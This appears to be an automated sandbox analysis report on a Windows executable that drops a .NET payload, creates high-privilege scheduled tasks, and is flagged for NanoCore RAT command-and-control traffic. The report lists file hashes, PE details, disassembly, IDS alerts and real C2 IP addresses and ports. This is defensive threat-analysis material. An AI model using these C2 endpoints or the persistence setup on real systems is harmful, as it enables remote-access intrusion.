SHA1:	A5470B5154C2000D77D444AAD7E19939FC171DB5
SHA-256:	4EBFEB846ED6CA27AC4CC8529EF902C9A56FB71B06E14E1514D96A21BC41D959
SHA-512:	481EF16C01259D7A0D830643320428A21ABDF975B2058E11C508CB1BD54DA59F7683435CDFBE692792B9C57A0BDBB506788AA949C504B0CE4E1DA1A51F123919
Malicious:	false
Preview:	9G4i6X85bS88NE854LU09H6aTTC474F17645r40L6d8iHY9298b2i50h44012..GuiDateTimePicker ComboConstants..Y99f8895r2M8SZMm9Rx06W5sRv9E4y7I77Us55LBq67F33gs0alp7q6YVlzlwOm201113991kX1M1QH5Xl39W4StlW779RGv4v41GyK65807yW416..ComboConstants ColorConstants..U1E6QS9Szq78F9e940j3B4vsgTp9600ohHF8qGAS4u4hgA816vC931u6dwga8ygv372y7fjRZ56151h72F35S9H2P1wkF0hDNXn9dnwksq98V317mxi8947759Qa2dg18Pw586YIVqq91..GuiDateTimePicker ToolbarConstants..nr30BC955..FontConstants DateTimeConstants..ltWd6ds591z30t80fQzrBX9g9X89t6EOXt2X3t3A5C44b94F0RPzbb1Xz4973pWQs3b5az4a158Ul314jnVnqpoVIfPi7wzW..BorderConstants DateTimeConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\xwmakcb.docx

Download File

Process:	C:\Users\user\Desktop\P05jmXYKpr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	5.56446671260521
Encrypted:	false
SSDEEP:
MD5:	05A03ED5B3120B420092518601CC840C
SHA1:	8AF644D3093E0E6E1A81E3F0A2F478F0D4387D2B
SHA-256:	DE18135659C53F7025CCE0FA6778B7397D83DA4CAAA9804AD311C6D67EC6FB23
SHA-512:	4E015A956FC8820ECC8CA4C950DA7A525EF8A33543B164C6A5FEBB5E37B40269B90051700587EBE72C8E92B41D618DC106DB2053C3464BF8D685357B8D7B7372
Malicious:	false
Preview:	wk259a6FU8wozV726nR252VH7oo5SLk4ZEYy9Jn9B0hDwO74B5Aler6X20W4db89..FontConstants ButtonConstants..Wc1SvX7948Xq27P811NWou6y4R4UFu6088l67O9V0uw55D4589QW4u89D1824WH8h1H7Vj9TTBc5y011Q3WJ381hext79750Tu4Q1359848O27a60P9eD4jH093b0..ButtonConstants GuiDateTimePicker..7eqW6E2vff344xpIe3t6815A1V067kw00zR9C3xZs69oNj7619E7rw0R2kA5988n8m9R9yMT8oAG9vb7GQE6a3138850247PYy37177ldFR477Z2..ColorConstants StructureConstants..aPp562Hh7QkP6h8edG6fRD8593aT4e3BP5DB0obEzR6106N669Q5l729UiF0l1u90FvO2r2id0228k2pvG58Syn6v88E0Kc53Z6j7628h73834Iy80l8a272kz1bdQq943d91H86186ype8566462qZR60I2O9q3o57Zc495c..BorderConstants ToolbarConstants..

C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45152
Entropy (8bit):	6.149629800481177
Encrypted:	false
SSDEEP:
MD5:	2867A3817C9245F7CF518524DFD18F28
SHA1:	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
SHA-256:	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
SHA-512:	7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\AppData\Local\Temp\tmpE45C.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.107159514403738
Encrypted:	false
SSDEEP:
MD5:	211C08A48B92E556A855FB90EE4B0942
SHA1:	4E3ECFBEA0CCA0EE2743C0E23ED3FC79EB2E282A
SHA-256:	21F529F720EE77AD03AFD3CFA4CE04EBAF243C3E752F14C268529665CA936146
SHA-512:	B65C55C05249DFFFD0B52DF66DBA692CE21B6D447DEA43E93DACE718E40ABAC069A6BD2DC4CF0BC3F979A327BB7896BE6A3A36540916A33E0CDA8B974E2955F1
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmpE586.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	248
Entropy (8bit):	7.094528505897445
Encrypted:	false
SSDEEP:
MD5:	061E700FE27D852034A5A44BF5985CCF
SHA1:	15B072DE6D6FDD92AE36F074345FA41985833E8D
SHA-256:	4BBB88AF530693EB4A710B0591D4BAF585837242C5690F5A821BF2FC9CC587CD
SHA-512:	CF6C5458AB50C859740490985D1E7E887D1116F3FA947FF2EC49AF9997A42F3402C63EF42B93498544195D9859FBB19CCC295966564B30F5ADB4A36D4E8886C6
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL....f.Z#.\|...@HkG....G..O*V..........pz...."....r...w&&\|..c..3}~.....~...os..f.......4..1.gJ.'.d".L...A.t...F.{....C.\|&.w

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:
MD5:	C423895161CCF32B983D88DF7E278B61
SHA1:	945D1ECC89886799DC030BC511F5F8A1567CCE27
SHA-256:	7FB989D7AB4EB7CD91C1448524B0734E5CB57B07D06C8A9F8350EE2D961A461E
SHA-512:	3EDAFCAEB7A7E61C32DDCF2867C31399D9F81205D211BEA5908D3D0C7024FBCED4DE9AAEB8B0716BC302D92CEF1967F25855ADC8842F941F9081A5D291DCBEA7
Malicious:	true
Preview:	M\|h..a.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.501629167387823
Encrypted:	false
SSDEEP:
MD5:	ACD3FB4310417DC77FE06F15B0E353E6
SHA1:	80E7002E655EB5765FDEB21114295CB96AD9D5EB
SHA-256:	DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
SHA-512:	DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
Malicious:	false
Preview:	9iH...}Z.4..f..J".C;"a

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	330240
Entropy (8bit):	7.999409395730101
Encrypted:	true
SSDEEP:
MD5:	0CA9956E5967CBD48189498803097888
SHA1:	6B0E6770D94C66479A57A0741CE2D4A582C544BA
SHA-256:	535452B987718279A4606B726A3DB76C48C74D8D5D4D08D10272511CBC7EB756
SHA-512:	D6FD9F69E0B402E6227131C7663753211DAC622FD3673218C5E1928686E6F1800081F28094EC7E13B9C08936791BEF304B346C578DF8F8B3D9284542AFF40911
Malicious:	false
Preview:	^.H.X8O......z.....@u].....}.... ...jr.M.6.....v.3P6...._.xh.ku..A.~..!..6N)R'.....u1!....5..F...C..Y.&.A.pd-..c.A.8`...\|.)@...r..`.;...UPM.......B...a.O.y....4..Z....?[..Et..:..`......k^?tR]..".lY....9..^M..VW.j...i.0-.....B.\|.PW....;mG.V...6&.<G..Ri.qo...I.`nW...Q.'.....xJ........f.. ..Oh/xt.k.1.c..496..[=.lA8.X.JM.a.......G.S"."3).C3.\J..3^..$d...k..m...R....0.@.>N.]...Zt.xKDF~....5...H.y...'#Q...h.cp...I.9'..@..u.0.9..ZY.[k...^..^a.=..1.P..8Y.r.Y..e...V..b!#o.r...kz..a..].~yU.A..hPx..U.U.x...;..xb.o.f..._q..-=...8.b......;..8R\|0i..........<....0i...}A..-.:#3..\.....-.../!..#rH..A.2.h.O..)`1..#.\..8.5.k..=,..;l........Mvk..h.......".e..y.I..Y...@.`.s?..c..p.).a..%.g;0....R.n...K.h.\z9..@p1..O...j3x.;>Z..........sy{.f.x..N.:..l...w.sPR....LN..-J><..'...3.j...".w'...9P0C.T..T..kK@.P]SmB<.~.......)h....J.U\|%..I...:_.3.y.........b..g..`.......Z......;.QM...A...:.....}...=).1..(.=4.O...}..8.r8....#.I_b*..D..&.....E.kH...B.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.4112044189276585
Encrypted:	false
SSDEEP:
MD5:	4879007AC97C3DF41896D937852ABBE7
SHA1:	05A8C8638A4C8157216EF4AE24B43D3A4E750F00
SHA-256:	18B03E2D9F5F5E7E26686848D71049AC56D06500A2AB420A3A01CA0ED6C7AD18
SHA-512:	03C80EC22591301B32EB0310A188B1C4C24DC16BF9E2E25B22A95AA6E36E9B7002196B13A522F36D9AC64C38A98D6BA06C3387DBBE7CB3319E45BC43359A6C43
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe

C:\Users\user\temp\cjeugvqj.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	69
Entropy (8bit):	4.818760421130472
Encrypted:	false
SSDEEP:
MD5:	05F06C28F5D955691BED4FBDC37385D3
SHA1:	0DFAEC0DDEDE341CDF6896BCBF8A6F710FA28E9E
SHA-256:	9C8BB284A5642CEF5D7A6B4BAB1606D8E444B5D33961EDA0EB6A6D53E09A35EA
SHA-512:	593B88B8E2E1FD59430DD3D6DB7890DD08939B04D69E88BD59C31C4A62CF0A339DAB3E555BED257EF331C4445A75FF71A7A8BE61064C2EF9E184866BFE606514
Malicious:	false
Preview:	[S3tt!ng]..stpths=C:..Key=Chrome..Dir3ctory=knmo..ExE_c=boaliim.dat..

\Device\ConDrv

Download File

Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	215
Entropy (8bit):	4.911407397013505
Encrypted:	false
SSDEEP:
MD5:	623152A30E4F18810EB8E046163DB399
SHA1:	5D640A976A0544E2DDA22E9DF362F455A05CFF2A
SHA-256:	4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
SHA-512:	1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.7997542721005315
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	P05jmXYKpr.exe
File size:	1115860
MD5:	db555a9de355c70681e2e5f9ed38a335
SHA1:	07534d5012526f6bdec5314a4d140de5d94672ea
SHA256:	fb25c8a64c09f9c4e8c586b94d5cda1dc69be203b786ea297f9293d7bd7b8b30
SHA512:	909caea1efe9ce4bfe357a2f987774c83f4b3be060b4d4b8337dd7f3ff939e615eccbb95a3e9e6ce4bd80f4172c39258c196cef42875a4dd32b9fbb315e4b9a2
SSDEEP:	24576:QTbBv5rUvUaHOI/dnZ5Tm0mGbQKomFGa6mFWqSRA4Q1Kpg6:CBUw85QX7A4Q1Wg6
TLSH:	AF351202BED184B2C5621D326A76BB21A93DBD301F758DCF63D00A2DEE715C1D635BA2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	163e3a121624633e

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F193CFC0B7Bh
jmp 00007F193CFC048Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F193CFB32D7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F193CFC391Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F193CFC061Ch
push 0000000Ch
push esi
call 00007F193CFBFBD9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F193CFB3252h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F193CFC33D9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F193CFC0598h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F193CFC33BCh
int3
jmp 00007F193CFC4E57h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x19fe4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7e000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x19fe4	0x1a000	False	0.8160494290865384	data	7.348244743499026	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7e000	0x233c	0x2400	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x646d4	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x6521c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x667c8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152
RT_ICON	0x66e30	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512
RT_ICON	0x67118	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128
RT_ICON	0x67240	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors
RT_ICON	0x680e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON	0x68990	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors
RT_ICON	0x68ef8	0xf268	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x78160	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600
RT_ICON	0x7a708	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON	0x7b7b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_DIALOG	0x7bc18	0x286	data	English	United States
RT_DIALOG	0x7bea0	0x13a	data	English	United States
RT_DIALOG	0x7bfdc	0xec	data	English	United States
RT_DIALOG	0x7c0c8	0x12e	data	English	United States
RT_DIALOG	0x7c1f8	0x338	data	English	United States
RT_DIALOG	0x7c530	0x252	data	English	United States
RT_STRING	0x7c784	0x1e2	data	English	United States
RT_STRING	0x7c968	0x1cc	data	English	United States
RT_STRING	0x7cb34	0x1b8	data	English	United States
RT_STRING	0x7ccec	0x146	data	English	United States
RT_STRING	0x7ce34	0x46c	data	English	United States
RT_STRING	0x7d2a0	0x166	data	English	United States
RT_STRING	0x7d408	0x152	data	English	United States
RT_STRING	0x7d55c	0x10a	data	English	United States
RT_STRING	0x7d668	0xbc	data	English	United States
RT_STRING	0x7d724	0xd6	data	English	United States
RT_GROUP_ICON	0x7d7fc	0x92	data
RT_MANIFEST	0x7d890	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3212.193.30.23049703617152025019 05/30/23-06:22:55.049348	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49703	61715	192.168.2.3	212.193.30.230
192.168.2.3212.193.30.23049705617152816766 05/30/23-06:23:09.678894	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49705	61715	192.168.2.3	212.193.30.230
192.168.2.3212.193.30.23049704617152025019 05/30/23-06:23:00.991147	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49704	61715	192.168.2.3	212.193.30.230
192.168.2.3212.193.30.23049704617152816766 05/30/23-06:23:02.678231	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49704	61715	192.168.2.3	212.193.30.230
192.168.2.3192.169.69.2649700617152025019 05/30/23-06:22:37.625556	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49700	61715	192.168.2.3	192.169.69.26
192.168.2.3212.193.30.23049703617152816766 05/30/23-06:22:55.907026	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49703	61715	192.168.2.3	212.193.30.230
192.168.2.3212.193.30.23049705617152025019 05/30/23-06:23:08.061417	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49705	61715	192.168.2.3	212.193.30.230
192.168.2.3192.169.69.2649701617152025019 05/30/23-06:22:43.112445	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49701	61715	192.168.2.3	192.169.69.26
212.193.30.230192.168.2.361715497032841753 05/30/23-06:22:55.906759	TCP	2841753	ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)	61715	49703	212.193.30.230	192.168.2.3
192.168.2.3192.169.69.2649699617152025019 05/30/23-06:22:32.082582	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49699	61715	192.168.2.3	192.169.69.26
192.168.2.3212.193.30.23049702617152025019 05/30/23-06:22:47.971581	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49702	61715	192.168.2.3	212.193.30.230
192.168.2.3212.193.30.23049702617152816766 05/30/23-06:22:50.317410	TCP	2816766	ETPRO TROJAN NanoCore RAT CnC 7	49702	61715	192.168.2.3	212.193.30.230

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2023 06:22:31.131561041 CEST	49699	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:31.605544090 CEST	61715	49699	192.169.69.26	192.168.2.3
May 30, 2023 06:22:31.606998920 CEST	49699	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:32.082581997 CEST	49699	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:32.593255997 CEST	61715	49699	192.169.69.26	192.168.2.3
May 30, 2023 06:22:37.036273956 CEST	49700	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:37.593662977 CEST	61715	49700	192.169.69.26	192.168.2.3
May 30, 2023 06:22:37.593805075 CEST	49700	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:37.625555992 CEST	49700	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:38.099855900 CEST	61715	49700	192.169.69.26	192.168.2.3
May 30, 2023 06:22:42.733571053 CEST	49701	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:43.111396074 CEST	61715	49701	192.169.69.26	192.168.2.3
May 30, 2023 06:22:43.112071037 CEST	49701	61715	192.168.2.3	192.169.69.26
